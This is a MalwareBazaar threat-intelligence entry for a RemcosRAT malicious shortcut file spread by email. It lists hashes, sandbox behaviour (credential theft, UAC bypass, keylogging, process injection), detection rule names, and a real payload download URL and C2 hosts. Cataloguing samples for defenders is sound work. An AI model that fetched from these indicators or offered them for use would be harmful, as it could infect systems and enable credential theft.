MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 6


Intelligence 6 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2
SHA3-384 hash: 0b89c6b620f7c815501af2cc73af398d2059a7e36ed26cd81fe4519073274e944d485fa9cb703a7c58bbe42bf0f77df4
SHA1 hash: c9d5e3dbaa2d48c6c9e8cad575e336f975ba966b
MD5 hash: 6e7c98e1220feaa449203144c761e950
humanhash: grey-crazy-ack-east
File name:Price request N°DEM23000193.lnk
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:2'022 bytes
First seen:2023-07-18 06:35:26 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 12:8eUm/3BVSXvk44X3ojsqzKtnWNQC0GopW+UcCsvXIelOG5e6lzbdpYrn1IlI5u9B:8s/BHYVKVWWCDX+/CW4YO2dd79dsHmB
TLSH T1E34189101FE50724F7B39B3568BAB7118D7B7C4AEE06CF8D015183882465624F4B9F6B
Reporter abuse_ch
Tags:lnk RemcosRAT

Intelligence

File Origin
# of uploads :
1
# of downloads :
153
Origin country :
NL NL
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.28759.LnkHeur.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.LOLBinOddLookPSHELL.20220711.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.OddLook.202207213.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2/results/dashboard
Payload URLs
URL
File name
http://thanhancompany.com/ta/dma.hta')
LNK File
Behaviour
BlacklistAPI detected
Gathering data
Verdict:
Malicious
Labled as:
LNK/TrojanDownloader.Agent
Link:
https://www.hybrid-analysis.com/sample/b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2
Result
Verdict:
MALICIOUS
Result
Threat name:
Remcos
Create hunting rule
Detection:
malicious
Classification:
spre.troj.adwa.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1274931
Signature
.NET source code contains potential unpacker
Allocates memory in foreign processes
Antivirus detection for dropped file
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to modify clipboard data
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Drops PE files to the startup folder
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Copy file to startup via Powershell
Snort IDS alert for network traffic
Suspicious command line found
Suspicious powershell command line found
Very long command line found
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1274931 Sample: Price_request_N#U00b0DEM230... Startdate: 18/07/2023 Architecture: WINDOWS Score: 100 89 Snort IDS alert for network traffic 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 12 other signatures 2->95 12 powershell.exe 11 2->12         started        15 Utilsap.exe.exe 2->15         started        process3 signatures4 117 Very long command line found 12->117 119 Suspicious command line found 12->119 121 Found suspicious powershell code related to unpacking or dynamic code loading 12->121 123 Powershell drops PE file 12->123 17 mshta.exe 23 12->17         started        21 conhost.exe 1 12->21         started        125 Windows shortcut file (LNK) starts blacklisted processes 15->125 23 powershell.exe 15->23         started        process5 dnsIp6 69 thanhancompany.com 192.185.191.127, 443, 49708, 49710 UNIFIEDLAYER-AS-1US United States 17->69 97 Windows shortcut file (LNK) starts blacklisted processes 17->97 99 Suspicious powershell command line found 17->99 101 Very long command line found 17->101 25 powershell.exe 12 17->25         started        71 192.168.2.1 unknown unknown 21->71 28 conhost.exe 23->28         started        signatures7 process8 signatures9 103 Windows shortcut file (LNK) starts blacklisted processes 25->103 105 Very long command line found 25->105 107 Suspicious command line found 25->107 30 cmd.exe 1 25->30         started        33 conhost.exe 25->33         started        process10 signatures11 127 Windows shortcut file (LNK) starts blacklisted processes 30->127 129 Suspicious powershell command line found 30->129 131 Very long command line found 30->131 35 powershell.exe 17 26 30->35         started        39 powershell.exe 15 30->39         started        41 conhost.exe 30->41         started        process12 dnsIp13 73 thanhancompany.com 35->73 75 mag.wcoomd.org 167.99.136.52, 443, 49709 DIGITALOCEAN-ASNUS United States 35->75 59 C:\Users\user\AppData\Roaming\dmw.exe, PE32 35->59 dropped 43 dmw.exe 3 35->43         started        46 AcroRd32.exe 39 35->46         started        file14 process15 signatures16 109 Antivirus detection for dropped file 43->109 111 Windows shortcut file (LNK) starts blacklisted processes 43->111 113 Machine Learning detection for dropped file 43->113 115 4 other signatures 43->115 48 InstallUtil.exe 43->48         started        52 powershell.exe 43->52         started        55 RdrCEF.exe 59 46->55         started        process17 dnsIp18 63 favor-grace-fax.home-webserver.de 85.31.44.129, 37782, 49711 CLOUDCOMPUTINGDE Germany 48->63 65 geoplugin.net 178.237.33.50, 49712, 80 ATOM86-ASATOM86NL Netherlands 48->65 77 Contains functionality to bypass UAC (CMSTPLUA) 48->77 79 Contains functionality to steal Chrome passwords or cookies 48->79 81 Contains functionality to modify clipboard data 48->81 87 3 other signatures 48->87 61 C:\Users\user\AppData\...\Utilsap.exe.exe, PE32 52->61 dropped 83 Drops PE files to the startup folder 52->83 85 Powershell drops PE file 52->85 57 conhost.exe 52->57         started        67 192.168.2.3 unknown unknown 55->67 file19 signatures20 process21
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2/
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wbbwsfymagbfkpzhjqzqpf2ft7ta3xfsnhie24nutgkmvtw7tdba._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
n/a
Link:
https://tria.ge/reports/230718-hcx35ahe2x/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Checks computer location settings
Blocklisted process makes network request
Malware Config
Dropper Extraction:
http://thanhancompany.com/ta/dma.hta
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/b04369170c01/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:EXE_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:PS_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name:Script_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies scripting artefacts in shortcut (LNK) files.
Rule name:SUSP_LNK_PowerShell
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to powershell inside an lnk file, which is suspicious

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

RemcosRAT

Shortcut (lnk) lnk b04369170c0182553f274c330797459fe60ddcb269d04d71b49994cacedf98c2

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments